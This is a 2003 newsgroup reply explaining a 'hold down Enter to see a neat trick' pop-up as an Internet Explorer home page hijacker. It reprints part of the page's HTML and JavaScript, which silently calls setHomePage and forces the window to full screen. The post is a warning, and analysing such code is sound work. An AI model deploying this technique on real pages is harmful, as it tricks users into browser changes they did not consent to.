It's a home page hijacker, which tricks you into holding down
the ENTER key, thus pressing "Yes" when asked to change
your home page. Of course, you probably won't see this, as
it happens so fast.
This is the "neat trick" - not a trick, at all, and quite safe:
http://object.passthison.com/console/Starfield3D.htm
This is (part of) the raw code for the home hijack page:
Header Information
-------------------------
HTTP/1.1 200 OK
Age: 16841
Accept-Ranges: bytes
Date: Sun, 07 Dec 2003 20:01:50 GMT
Content-Length: 3781
Content-Type: text/html
Server: Apache/1.3.26 (Unix)
Last-Modified: Sat, 06 Dec 2003 21:47:21 GMT
ETag: "a2406-ec5-3fd24e69"
Via: 1.1 webcacheB03 (NetCache NetApp/5.2.1R3)
Page Data
-------------------------
<HTML XMLNS:IE>
<head>
<title>Windows</title>
<STYLE>
@media all {
IE\:HOMEPAGE {behavior:url(#default#homepage)}
}
</STYLE>
<IE:HOMEPAGE ID="homepage" />
<script language=Javascript>
function pop(){
var expdate = new Date((new Date()).getTime() + 172800000);
if (-1 == -1) {
document.cookie="home=general; expires=" + expdate.toGMTString() + "; path=/;";
if(ie){ homepage.setHomePage("http://xxxxxxx-xxxxxxxx-xxxxxxx.xxx/xxxxx.xxx?xxxxxxxx");
}
}
//self.close();
}
var ie = false;
var ns = false;
if(parseInt(navigator.appVersion) >= 4){
if(navigator.appName.indexOf("crosoft") != -1) ie = true;
if(navigator.appName.indexOf("etscape") != -1) ns = true;
}
</script>
</head>
<body bgcolor=red leftborder=0 topborder=0 borderleft=0 bordertop=0>
<script language=javascript>
<!--
var agt=navigator.userAgent.toLowerCase();
var is_ie = (agt.indexOf("msie") != -1);
var is_aol = (agt.indexOf("aol") != -1);
if (!is_aol) {
self.moveTo(0,0);
self.resizeTo(screen.availWidth,screen.availHeight );
}
//-->
</script>
<Script snipped>
window.open('Starfield3D.htm');
self.close();
</script>
</body>
</html>
On Sun, 7 Dec 2003 19:35:56 -0500, in
<vGPAb.11066$>
bjones scrawled:
>Don't know much about these but one seemed to pop up out of
>nowhere on my pc this morning while surfing cnn.com
>
>http://object.passthison.com/console/home.html
>
>It showed in an IExplore browser window, no tool bars, all red
>screen with a small window in the middle which said "Hold down
>your enter key for 10 seconds to see a neat trick". I didn't do it.
>Couldn't close the window normally, had to use task manager to
>do it.
>
>Ring any bells with anyone? TIA
>
>
>
--
Basic computer maintenance
http://uk.geocities.com/personel44/maintenance.html